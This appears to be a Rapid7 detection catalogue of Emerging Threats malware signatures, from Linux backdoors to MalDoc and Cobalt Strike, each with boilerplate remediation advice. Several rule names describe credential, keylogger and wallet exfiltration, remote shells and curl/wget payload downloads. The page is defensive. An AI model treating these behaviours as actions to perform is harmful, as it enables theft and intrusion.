This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Linux Backdoor Linux/Cdorked.A Redirect 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux Backdoor Linux/Cdorked.A Redirect 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux Backdoor Linux/Cdorked.A Redirect 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux DarkRadiation Ransomware Activity Attack Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Linux DarkRadiation Ransomware Activity (curl)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Linux DarkRadiation Ransomware Activity (wget)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Linux DarkRadiation Ransomware Telegram Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Linux/Lady CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Linux/Lady CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Linux/LuaBot CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Linux/MayhemBruter Inbound Ping From CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux/Moose HTTP CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Linux/Moose HTTP CnC Beacon Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Linux.Mumblehard Command Status CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux.Mumblehard Initial Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux.Ngioweb Stage 1 CnC Activity Client Request (set)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux/Ssemgrvd sshd Backdoor HTTP CNC 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux/Ssemgrvd sshd Backdoor HTTP CNC 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux/SSHDoor.A Reporting Backdoor CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Linux/Torte Downloading Binary

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux/Tsunami Downloader

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux/Tsunami Downloader

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux/Tsunami Remote Shell M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linux/Tsunami Remote Shell M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LNK/Agent.GX CnC Traffic

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LockPOS CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Locky CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Locky CnC Checkin Dec 5 M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Locky CnC Checkin HTTP Pattern

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Locky CnC checkin Nov 21

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Locky CnC checkin Nov 21 M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Locky Intermediate Downloader

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LogPOS Sending Data

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Cryptocurrency Wallet Exfiltration Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Fake 404 Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot File Exfiltration Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Keylogger Data Exfiltration Detected M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Keylogger Data Exfiltration Detected M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Request for C2 Commands Detected M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Request for C2 Commands Detected M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot Screenshot Exfiltration Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Loki Locker Ransomware CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Loki Locker Ransomware Server Response (Public Key) M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Loki Locker Ransomware Server Response (Public Key) M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Loki Locker Ransomware User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LolliCrypt Ransomware Sending Data to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE lolzilla JS/PHP WebSkimmer - Data Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lop_com or variant Checkin (9kgen_up)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lop.gfr/Swizzor HTTP Update/Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lost Door Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE lu0bot Loader HTTP Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE lu0bot Loader HTTP Request M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE lu0bot Loader HTTP Request M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE lu0bot Loader HTTP Response M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LuckyCat/TROJ_WIMMIE Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lucky Ransomware Reporting Successful File Encryption

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Luder.B User-Agent (Mozilla/4.0 (SPGK)) - GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LumOffice Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lunar Builder CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lunar Builder Exfil Attempt

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lunar Builder Exfil Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lunar Builder Exfil via Discord M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lunar Builder Exfil via Discord M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lurk Click fraud Template Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lurk Downloader Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lyceum Backdoor CnC Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lyceum Backdoor CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lyceum Backdoor CnC Activity M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LYCEUM MSIL/DanBot CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lyposit Ransomware Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Lyposit Ransomware Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Mac Flashback Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mac Flashback Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MacOS/UpdateAgent.A CnC Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MacOS/UpdateAgent.A CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mac Trojan HTTP Checkin (accept-language violation)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mac User-Agent Typo INBOUND Likely Hostile

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MageCart CnC Domain in SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MageCart Exfil URI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MageCart JS Retrieval

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Magecart/Skimmer - AngryBeaver Exfil Attempt

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Magecart/Skimmer - _try_action Exfil Attempt

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MAGICHOUND.FETCH CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE MAGICHOUND.FETCH Retrieving Malicious PowerShell

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MAGICHOUND.RETRIEVER CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Magician/M461c14n Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE MagikPOS CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE MagikPOS Downloader Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MagikPOS Downloader Retrieving Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Magniber Ransomware Retrieving Instructions

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Maldoc Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Activity Sending Windows User Info (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Activity (set)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Checkin Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Downloading from Dropbox via API

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MalDoc Exfil (2019-12-12)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc OneDrive Download Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MalDoc Requesting Payload 2020-04-21

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Retrieving Additional Resources (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Retrieving Binary (Likely Trickbot)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MalDoc Retrieving Payload 2021-06-15

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Retrieving Payload 2021-07-06

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MalDoc Retrieving Payload March 30 2017

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MalDoc Retrieving Payload May 23 2017 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MalDoc Retrieving Possible Ostap Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Retrieving Remote Template (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Second Stage VBS Downloader with URL Padding

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maldoc Sending Windows System Information (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious Chrome Extension Requesting Websocket

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious Cobalt Strike SSL Cert (asurecloud .tech)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

